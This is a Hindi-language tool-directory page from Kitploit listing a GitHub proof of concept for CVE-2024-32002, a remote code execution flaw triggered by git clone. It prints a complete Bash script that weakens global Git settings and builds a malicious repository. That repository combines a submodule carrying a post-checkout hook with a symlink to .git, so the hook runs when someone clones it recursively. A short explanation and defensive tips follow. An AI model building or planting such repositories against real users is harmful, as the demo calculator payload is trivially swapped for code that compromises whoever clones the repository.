Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-32002-poc — CVE-2024-32002 Git में एक गंभीर कमजोरी है, जो हमलावरों को उपयोगकर्ता द्वारा git clone क्रिया निष्पादित करने पर दूरस्थ रूप से मनमाना कोड निष्पादित (RCE) करने की अनुमति देती है। | Kitploit
उपकरण/GitHubGitHub/bohemianhacks/cve-2024-32002-poc
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरेड टीमिंगपेलोड डेवलपमेंट
GitHubbohemianhacks/cve-2024-32002-poc

CVE-2024-32002-poc

CVE-2024-32002 Git में एक गंभीर कमजोरी है, जो हमलावरों को उपयोगकर्ता द्वारा git clone क्रिया निष्पादित करने पर दूरस्थ रूप से मनमाना कोड निष्पादित (RCE) करने की अनुमति देती है।

रिपॉजिटरी देखें
111 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

Bash स्क्रिप्ट:

root@kitploit:~
#!/bin/bash

# Set Git configuration options
git config --global protocol.file.allow always
git config --global core.symlinks true
# Avoid warning messages (set default branch to main)
git config --global init.defaultBranch main 

# Define tell-tale path
tell_tale_path="$PWD/tell.tale"

# Initialize hook repository
git init hook
cd hook
mkdir -p y/hooks

# Write malicious code to hook, compatible with Windows and macOS
cat > y/hooks/post-checkout <<EOF
#!/bin/bash
calc.exe
open -a Calculator.app
EOF

# Make hook executable: important
chmod +x y/hooks/post-checkout

git add y/hooks/post-checkout
git commit -m "post-checkout"

cd ..

# Define hook repository path
hook_repo_path="$(pwd)/hook"

# Initialize captain repository
git init captain
cd captain
git submodule add --name x/y "$hook_repo_path" A/modules/x
git commit -m "add-submodule"

# Create symbolic link
printf ".git" > dotgit.txt
git hash-object -w --stdin < dotgit.txt > dot-git.hash
printf "120000 %s 0\ta\n" "$(cat dot-git.hash)" > index.info
git update-index --index-info < index.info
git commit -m "add-symlink"
cd ..

# Local testing (not needed for GitHub)
git clone --recursive captain hooked

सादे अंग्रेजी में स्पष्टीकरण:

यह Bash स्क्रिप्ट एक दुर्भावनापूर्ण Git रिपॉजिटरी बनाती है जो एक कमजोरी (CVE-2024-32002) का शोषण करती है ताकि जब कोई रिपॉजिटरी को क्लोन करे तो दुर्भावनापूर्ण कोड निष्पादित हो सके।

स्क्रिप्ट क्या करती है इसका विवरण इस प्रकार है:

  1. Git कॉन्फ़िगरेशन सेट करता है: हमले के लिए आवश्यक कुछ सुविधाओं को सक्षम करता है।
  2. एक दुर्भावनापूर्ण हुक रिपॉजिटरी बनाता है: इस रिपॉजिटरी में एक छिपी हुई स्क्रिप्ट होती है जो किसी के द्वारा इसे क्लोन करने पर चलेगी।
  3. एक भ्रामक रिपॉजिटरी बनाता है: "captain" नामक यह रिपॉजिटरी हानिरहित प्रतीत होती है लेकिन गुप्त रूप से इसमें दुर्भावनापूर्ण हुक रिपॉजिटरी एक सबमॉड्यूल के रूप में मौजूद होती है।
  4. एक प्रतीकात्मक लिंक जोड़ता है: इस चाल का उपयोग दुर्भावनापूर्ण हुक को छिपाने और रिपॉजिटरी के क्लोन होने पर उसे निष्पादित करने के लिए किया जाता है।

जब कोई "captain" रिपॉजिटरी को क्लोन करता है, तो दुर्भावनापूर्ण स्क्रिप्ट उनके कंप्यूटर पर चलेगी, जिससे हानिकारक परिणाम हो सकते हैं जैसे:

  • मैलवेयर इंस्टॉल करना: स्क्रिप्ट दुर्भावनापूर्ण सॉफ़्टवेयर डाउनलोड और इंस्टॉल कर सकती है।
  • डेटा चोरी: यह पीड़ित के कंप्यूटर से संवेदनशील जानकारी चुरा सकती है।
  • सिस्टम से समझौता: स्क्रिप्ट सिस्टम तक अनधिकृत पहुँच प्राप्त कर सकती है।

ऐसे हमलों से स्वयं को बचाने के लिए:

  • अपने Git क्लाइंट को अद्यतित रखें: कमजोरियों को दूर करने के लिए नवीनतम संस्करण सुनिश्चित करें।
  • रिपॉजिटरी क्लोन करते समय सावधान रहें: केवल विश्वसनीय स्रोतों से रिपॉजिटरी क्लोन करें।
  • एक प्रतिष्ठित एंटीवायरस प्रोग्राम का उपयोग करें: यह दुर्भावनापूर्ण सॉफ़्टवेयर का पता लगाने और उसे ब्लॉक करने में मदद कर सकता है।
  • फ़िशिंग हमलों से सावधान रहें: संदिग्ध लिंक पर क्लिक करने या अज्ञात स्रोतों से फ़ाइलें डाउनलोड करने से बचें।

इन सावधानियों का पालन करके, आप इसी प्रकार के हमलों का शिकार होने के जोखिम को काफी हद तक कम कर सकते हैं।

टूल डाउनलोड करें